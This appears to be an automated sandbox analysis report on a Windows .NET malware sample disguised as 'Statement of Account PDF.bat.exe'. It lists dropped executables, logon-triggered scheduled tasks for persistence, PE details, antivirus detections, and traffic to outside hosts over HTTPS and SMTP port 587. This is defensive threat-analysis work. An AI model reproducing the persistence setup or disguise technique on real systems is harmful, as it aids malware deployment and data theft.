                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                      C:\Users\user\AppData\Local\Temp\tmp216B.tmp

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\gDdsxauPhk.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1576
                                                      Entropy (8bit):5.107376380597849
                                                      Encrypted:false
                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtasxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTxv
                                                      MD5:9D7F39C8E0667388818F45A197737E62
                                                      SHA1:53D78BAF1CB57A444E85767F3641A792A62B3295
                                                      SHA-256:972C48F606DF7A57676FD06674BDE849337270E4FC65AFECA873504C712B336C
                                                      SHA-512:D1B65497DFADAA90A14B2C4D5E87E9941AC41718B9A6AACEA23BA73319F47C90AAEDE32B2323A36B69498ABCE1E4F7A1EF2BD87F3D5AF3BC5DFF3F2757CB2EE2
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                      C:\Users\user\AppData\Local\Temp\tmp44D2.tmp

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1576
                                                      Entropy (8bit):5.107376380597849
                                                      Encrypted:false
                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtasxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTxv
                                                      MD5:9D7F39C8E0667388818F45A197737E62
                                                      SHA1:53D78BAF1CB57A444E85767F3641A792A62B3295
                                                      SHA-256:972C48F606DF7A57676FD06674BDE849337270E4FC65AFECA873504C712B336C
                                                      SHA-512:D1B65497DFADAA90A14B2C4D5E87E9941AC41718B9A6AACEA23BA73319F47C90AAEDE32B2323A36B69498ABCE1E4F7A1EF2BD87F3D5AF3BC5DFF3F2757CB2EE2
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                      C:\Users\user\AppData\Local\Temp\tmp6598.tmp

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:modified
                                                      Size (bytes):1576
                                                      Entropy (8bit):5.107376380597849
                                                      Encrypted:false
                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtasxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTxv
                                                      MD5:9D7F39C8E0667388818F45A197737E62
                                                      SHA1:53D78BAF1CB57A444E85767F3641A792A62B3295
                                                      SHA-256:972C48F606DF7A57676FD06674BDE849337270E4FC65AFECA873504C712B336C
                                                      SHA-512:D1B65497DFADAA90A14B2C4D5E87E9941AC41718B9A6AACEA23BA73319F47C90AAEDE32B2323A36B69498ABCE1E4F7A1EF2BD87F3D5AF3BC5DFF3F2757CB2EE2
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                      C:\Users\user\AppData\Local\Temp\tmp690.tmp

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Statement of Account PDF.bat.exe
                                                      File Type:XML 1.0 document, ASCII text
                                                      Category:dropped
                                                      Size (bytes):1576
                                                      Entropy (8bit):5.107376380597849
                                                      Encrypted:false
                                                      SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtasxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTxv
                                                      MD5:9D7F39C8E0667388818F45A197737E62
                                                      SHA1:53D78BAF1CB57A444E85767F3641A792A62B3295
                                                      SHA-256:972C48F606DF7A57676FD06674BDE849337270E4FC65AFECA873504C712B336C
                                                      SHA-512:D1B65497DFADAA90A14B2C4D5E87E9941AC41718B9A6AACEA23BA73319F47C90AAEDE32B2323A36B69498ABCE1E4F7A1EF2BD87F3D5AF3BC5DFF3F2757CB2EE2
                                                      Malicious:true
                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail

                                                      C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Statement of Account PDF.bat.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):709632
                                                      Entropy (8bit):7.947855789155266
                                                      Encrypted:false
                                                      SSDEEP:12288:lYIPXj/PqfEKyBVaLXKfjJUKJepONj9BtjWVpFZt/DAjB4Bd:lYIPesVaLXKnJeAj9BtqzFHiWX
                                                      MD5:8DB4915BA4E6BB27CB249554A18A9F4C
                                                      SHA1:FD3E06212F9DA365C2106DCD808CAF291CCB3A2A
                                                      SHA-256:470E7BCB766A436B50D28E362621B59467B6E6AA4146B467F4175A8B5C9EAA04
                                                      SHA-512:EC42A9DE73E4E79911CF870FD3D41392B1DC5726CEB4660BA8D7BC4BBEDEE9A3E111CB5426B3D3797C8517CEBB2BDBB4E7D3A96590EE14F2BB89B4A3E286B50C
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 47%
                                                      • Antivirus: Virustotal, Detection: 57%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j................0.............".... ........@.. .......................@............@.....................................O.......|.................... ..........p............................................ ............... ..H............text...H.... ...................... ..`.rsrc...|...........................@..@.reloc....... ......................@..B........................H............N......+....................................................0...........sq...}.....st...}.....st...}.....sX...}.....s....}.....sj...}.....s....}.....sj...}.....sl...}.....sR...}.....s....}.....s....}.....s]...}......}.....(.......()....*....{....(.......{&...(......(......(.....*....0............{.....{....o~.....{.....{....ox.....{.....{....ov.....{.....{....o|.....{.....{....oz.....{.....o......{.....o......{.....o......{.....o......{.....o......{#...r...p.{...

                                                      C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe:Zone.Identifier

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Statement of Account PDF.bat.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                      C:\Users\user\AppData\Roaming\gDdsxauPhk.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Statement of Account PDF.bat.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):709632
                                                      Entropy (8bit):7.947855789155266
                                                      Encrypted:false
                                                      SSDEEP:12288:lYIPXj/PqfEKyBVaLXKfjJUKJepONj9BtjWVpFZt/DAjB4Bd:lYIPesVaLXKnJeAj9BtqzFHiWX
                                                      MD5:8DB4915BA4E6BB27CB249554A18A9F4C
                                                      SHA1:FD3E06212F9DA365C2106DCD808CAF291CCB3A2A
                                                      SHA-256:470E7BCB766A436B50D28E362621B59467B6E6AA4146B467F4175A8B5C9EAA04
                                                      SHA-512:EC42A9DE73E4E79911CF870FD3D41392B1DC5726CEB4660BA8D7BC4BBEDEE9A3E111CB5426B3D3797C8517CEBB2BDBB4E7D3A96590EE14F2BB89B4A3E286B50C
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 47%
                                                      • Antivirus: Virustotal, Detection: 57%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j................0.............".... ........@.. .......................@............@.....................................O.......|.................... ..........p............................................ ............... ..H............text...H.... ...................... ..`.rsrc...|...........................@..@.reloc....... ......................@..B........................H............N......+....................................................0...........sq...}.....st...}.....st...}.....sX...}.....s....}.....sj...}.....s....}.....sj...}.....sl...}.....sR...}.....s....}.....s....}.....s]...}......}.....(.......()....*....{....(.......{&...(......(......(.....*....0............{.....{....o~.....{.....{....ox.....{.....{....ov.....{.....{....o|.....{.....{....oz.....{.....o......{.....o......{.....o......{.....o......{.....o......{#...r...p.{...

                                                      C:\Users\user\AppData\Roaming\gDdsxauPhk.exe:Zone.Identifier

                                                      Download File
                                                      Process:C:\Users\user\Desktop\Statement of Account PDF.bat.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:false
                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):7.947855789155266
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:Statement of Account PDF.bat.exe
                                                      File size:709'632 bytes
                                                      MD5:8db4915ba4e6bb27cb249554a18a9f4c
                                                      SHA1:fd3e06212f9da365c2106dcd808caf291ccb3a2a
                                                      SHA256:470e7bcb766a436b50d28e362621b59467b6e6aa4146b467f4175a8b5c9eaa04
                                                      SHA512:ec42a9de73e4e79911cf870fd3d41392b1dc5726ceb4660ba8d7bc4bbedee9a3e111cb5426b3d3797c8517cebb2bdbb4e7d3a96590ee14f2bb89b4a3e286b50c
                                                      SSDEEP:12288:lYIPXj/PqfEKyBVaLXKfjJUKJepONj9BtjWVpFZt/DAjB4Bd:lYIPesVaLXKnJeAj9BtqzFHiWX
                                                      TLSH:3CE412402AF85B67F97D73F80520255843F02A296A63FB4C2FD0A2E3257B7954B50B7B
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j.................0.............".... ........@.. .......................@............@................................

                                                      File Icon

                                                      Icon Hash:90cececece8e8eb0

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x4ae922
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x9CBFCD6A [Fri May 2 16:20:58 2053 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                      Entrypoint Preview

                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      xor eax, 35455354h
                                                      xor dword ptr [edi+eax*2], esi
                                                      dec eax
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [ebx+4Ah], dl
                                                      push ebx
                                                      cmp byte ptr [eax+edi+34h], al
                                                      inc ebx
                                                      inc ebx
                                                      xor al, 37h
                                                      xor eax, 00000035h
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al
                                                      add byte ptr [eax], al

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xae8cf0x4f.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xb00000x57c.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xb20000xc.reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0xacaec0x70.text
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                      Sections

                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                      .text0x20000xac9480xaca00cc6f8d495a151764c88415effb41004dFalse0.9525550438993483data7.953860448849022IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc0xb00000x57c0x6001f75e371351229bd6b94315dca34c3bfFalse0.4108072916666667data4.003547176750001IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc0xb20000xc0x200aa8be37c15602334eb6c67566044895aFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                      Resources

                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                      RT_VERSION0xb00900x2ecdata0.43983957219251335
                                                      RT_MANIFEST0xb038c0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                      Imports

                                                      DLLImport
                                                      mscoree.dll_CorExeMain

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Apr 26, 2024 10:32:57.959342957 CEST49734443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:32:57.959407091 CEST44349734104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:32:57.959517002 CEST49734443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:32:57.990559101 CEST49734443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:32:57.990588903 CEST44349734104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:32:58.258552074 CEST44349734104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:32:58.258658886 CEST49734443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:32:58.278544903 CEST49734443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:32:58.278615952 CEST44349734104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:32:58.279619932 CEST44349734104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:32:58.323865891 CEST49734443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:32:58.380043983 CEST49734443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:32:58.420130968 CEST44349734104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:32:58.577439070 CEST44349734104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:32:58.577573061 CEST44349734104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:32:58.577667952 CEST49734443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:32:58.584738970 CEST49734443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:32:59.556538105 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:32:59.753226042 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:32:59.753345013 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:00.070991039 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:00.074568987 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:00.271383047 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:00.271923065 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:00.470662117 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:00.472225904 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:00.680167913 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:00.680197001 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:00.680213928 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:00.680294991 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:00.715018034 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:00.911931992 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:00.914824963 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:01.111970901 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:01.113197088 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:01.312346935 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:01.312803030 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:01.551106930 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:01.620796919 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:01.624671936 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:01.822881937 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:01.823427916 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:01.823704004 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:02.062201977 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:02.074182034 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:02.074415922 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:02.271310091 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:02.271348000 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:02.271990061 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:02.272042990 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:02.272079945 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:02.272104979 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:02.469218016 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:02.469372988 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:02.469969988 CEST5874973650.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:02.511368036 CEST49736587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:04.312026024 CEST49737443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:04.312068939 CEST44349737104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:04.312144041 CEST49737443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:04.316140890 CEST49737443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:04.316154957 CEST44349737104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:04.575211048 CEST44349737104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:04.575318098 CEST49737443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:04.576860905 CEST49737443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:04.576869011 CEST44349737104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:04.577203989 CEST44349737104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:04.620735884 CEST49737443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:04.670937061 CEST49737443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:04.712132931 CEST44349737104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:04.904771090 CEST44349737104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:04.904844999 CEST44349737104.26.12.205192.168.2.4
                                                      Apr 26, 2024 10:33:04.904920101 CEST49737443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:04.907715082 CEST49737443192.168.2.4104.26.12.205
                                                      Apr 26, 2024 10:33:05.642848015 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:05.839730978 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:05.839852095 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:06.113437891 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:06.117778063 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:06.314546108 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:06.317152977 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:06.515319109 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:06.515831947 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:06.732532978 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:06.732641935 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:06.732681990 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:06.732770920 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:06.737844944 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:06.935890913 CEST5874973950.87.195.61192.168.2.4
                                                      Apr 26, 2024 10:33:06.980132103 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:07.030622005 CEST49739587192.168.2.450.87.195.61
                                                      Apr 26, 2024 10:33:07.227381945 CEST5874973950.87.195.61192.168.2.4
